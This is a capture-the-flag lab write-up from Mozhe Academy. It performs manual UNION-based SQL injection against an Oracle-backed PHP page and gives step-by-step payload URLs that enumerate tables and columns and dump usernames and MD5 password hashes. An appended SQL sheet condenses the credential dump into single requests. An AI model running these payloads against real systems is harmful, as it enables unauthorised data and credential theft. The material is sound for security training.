Manual SQL Injection Vulnerability Test (Oracle Database) - Mozhe Academy

1. Find the injection point

Click the position marked by the red box in the figure to find the injection point.

The injection point is shown in the figure: the `id` parameter of `new_list.php`.

2. Determine how the parameter is closed

Append `and 1=1` and `and 1=2` to the parameter and compare the two responses.

The page comes back normally with `and 1=1` and differently with `and 1=2`. Both probes work appended directly to `id=1` with no quote, so the parameter is injected as a number (numeric type); every payload below relies on this and never has to close a quote.

3. Determine the number of columns

order by 2

http://124.70.64.48:49603/new_list.php?id=1 order by 2

order by 3

http://124.70.64.48:49603/new_list.php?id=1 order by 3

`order by 2` returns normally and `order by 3` fails, so the query selects 2 columns.

4. Find which columns are echoed

http://124.70.64.48:49603/new_list.php?id=1 union select 'null','null' from dual

In Oracle every SELECT needs a FROM clause, so the UNION part selects from the dummy table `dual`. Each position in the UNION must also have the same data type as the matching column of the original query (otherwise Oracle raises ORA-01790); two string literals are accepted here, which shows both original columns are character columns. The page shows where each 'null' lands, and the second column is the one used to display data from here on.

5. Query the database version

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

`v$version` is a public synonym for `sys.v_$version`. The `rownum=1` filter is required because a scalar subquery may return only one row (otherwise ORA-01427).

6. Query the current database name

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select instance_name from V$INSTANCE) from dual

Strictly, `instance_name` from `v$instance` is the instance (SID) name; the schema the web application actually connects as is returned by `select user from dual`, and that schema is what `user_tables` and `user_tab_columns` below are scoped to.

7. Query the table names

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1) from dual

The first table is called 'LOGMNR_SESSION_EVOLVE$'.

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

The second table is called 'LOGMNR_GLOBAL$'.

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$' ) from dual

The third table is called LOGMNR_GT_TAB_INCLUDES.

Names already seen are excluded with `not in` because Oracle assigns `rownum` as rows pass the WHERE clause, so `rownum=2` never matches anything: each request can only return the first remaining row. Walking a whole schema this way is slow, so switch to a pattern search.

Fuzzy query

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1 ) from dual

The target table 'sns_users' is found. Oracle stores unquoted identifiers in upper case, so `'%user%'` only matches this table because it was created with a quoted, lower-case name; that also means it has to be referenced as "sns_users", in double quotes, when querying it later.

8. Query the column names

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 )from dual

The column 'USER_NAME' is found.

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME' )from dual

The column 'USER_PWD' is found.

http://124.70.64.48:47475/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME' and column_name not in 'USER_PWD' )from dual

The column 'STATUS' is found.

http://124.70.64.48:47475/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME' and column_name not in 'USER_PWD' and column_name not in 'STATUS' )from dual

Nothing is returned, so all the columns have been found: 'USER_NAME', 'USER_PWD', 'STATUS'.

9. Query the data to obtain the account and password fields

http://124.70.64.48:47475/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

Here `id=-1` matches no real row, so the only row the page renders is the UNION row and both echoed columns now carry injected data. The table name is double-quoted because it is stored in lower case; USER_NAME and USER_PWD are upper case in the data dictionary, so they need no quotes.

USER_NAME=zhong

USER_PWD=1c63129ae9asc60asdua94d3e00495

http://124.70.64.48:47475/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

USER_NAME=hu

USER_PWD=1c63129ae9db9g20asdua94d3e00495

http://124.70.64.48:47475/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

USER_NAME=mozhe

USER_PWD=2c3b41177293cad3fccf79a69ac398f2
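The following SQL sheet is an added example, not code from the original post or from the Mozhe lab. It collects the Oracle-specific parts of the procedure above into the form the database actually executes, and shows two alternatives to the growing `not in` chain: `ROW_NUMBER()` to pick the Nth row directly, and `LISTAGG` to pull a whole list in one request. The shape of the back-end query and the `news`, `title` and `body` names are assumptions; the table "sns_users" and its columns are the ones found above.

```sql
-- Assumed shape of the query behind new_list.php (the page never shows it):
--   SELECT title, body FROM news WHERE id = <id>
-- With id=-1 the original query matches no row, so the UNION row is the only
-- one rendered. As a URL each statement below is:
--   new_list.php?id=-1 union select 'null',(<scalar subquery>) from dual

-- 1. Fingerprint: version, instance (SID), connecting schema, database name.
SELECT 'null', (SELECT banner FROM v$version WHERE rownum = 1) FROM dual;
SELECT 'null', (SELECT instance_name FROM v$instance) FROM dual;
SELECT 'null', user FROM dual;                              -- current schema
SELECT 'null', sys_context('USERENV', 'DB_NAME') FROM dual; -- database name

-- 2. rownum is numbered as rows pass the WHERE clause, so "rownum = 2" never
--    matches. Pick the Nth table with ROW_NUMBER() instead of a chain of
--    "not in" exclusions; change rn to step through the list.
SELECT 'null', (
  SELECT table_name FROM (
    SELECT table_name, ROW_NUMBER() OVER (ORDER BY table_name) AS rn
    FROM user_tables
  ) WHERE rn = 3
) FROM dual;

-- 3. Or fetch every table name in one request (LISTAGG needs 11gR2+; the
--    result is a VARCHAR2 and raises ORA-01489 past 4000 bytes, so filter
--    first on a large schema).
SELECT 'null', (
  SELECT LISTAGG(table_name, ',') WITHIN GROUP (ORDER BY table_name)
  FROM user_tables
) FROM dual;

-- 4. Unquoted identifiers are stored in upper case; "sns_users" was created
--    quoted and is stored in lower case. UPPER() matches both spellings,
--    which the page's '%user%' pattern does not.
SELECT 'null', (
  SELECT LISTAGG(table_name, ',') WITHIN GROUP (ORDER BY table_name)
  FROM user_tables WHERE UPPER(table_name) LIKE '%USER%'
) FROM dual;

-- 5. Columns of the target table, with their types, in one request. The
--    literal must match the stored (lower-case) name exactly.
SELECT 'null', (
  SELECT LISTAGG(column_name || ':' || data_type, ',')
         WITHIN GROUP (ORDER BY column_id)
  FROM user_tab_columns WHERE table_name = 'sns_users'
) FROM dual;

-- 6. Dump all rows at once. The table name must be double-quoted because it
--    is lower case; USER_NAME, USER_PWD and STATUS are upper case in the
--    dictionary and need no quotes.
SELECT 'null', (
  SELECT LISTAGG(user_name || ':' || user_pwd || ':' || status, ';')
         WITHIN GROUP (ORDER BY user_name)
  FROM "sns_users"
) FROM dual;

-- 7. One row per request when the echoed column is too narrow for LISTAGG:
--    exclude the names already read and take the first remaining row.
SELECT user_name, user_pwd FROM "sns_users"
WHERE user_name NOT IN ('zhong', 'hu') AND rownum = 1;
```

Step 7 is the form the post uses; steps 2 and 3 reach the same data in fewer requests, which matters when each request is a full page load. All of the `user_*` views are scoped to the connecting schema; to enumerate other schemas replace them with `all_tables` and `all_tab_columns` and filter on `owner`.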

The password is stored as an MD5 hash. MD5 is a hash, not an encryption, so it cannot be decoded; the plaintext is recovered by looking the hash up in a precomputed table (an online MD5 lookup service or a wordlist-based cracker).

Log in with the account and the recovered password.

Get the key.

Level cleared!
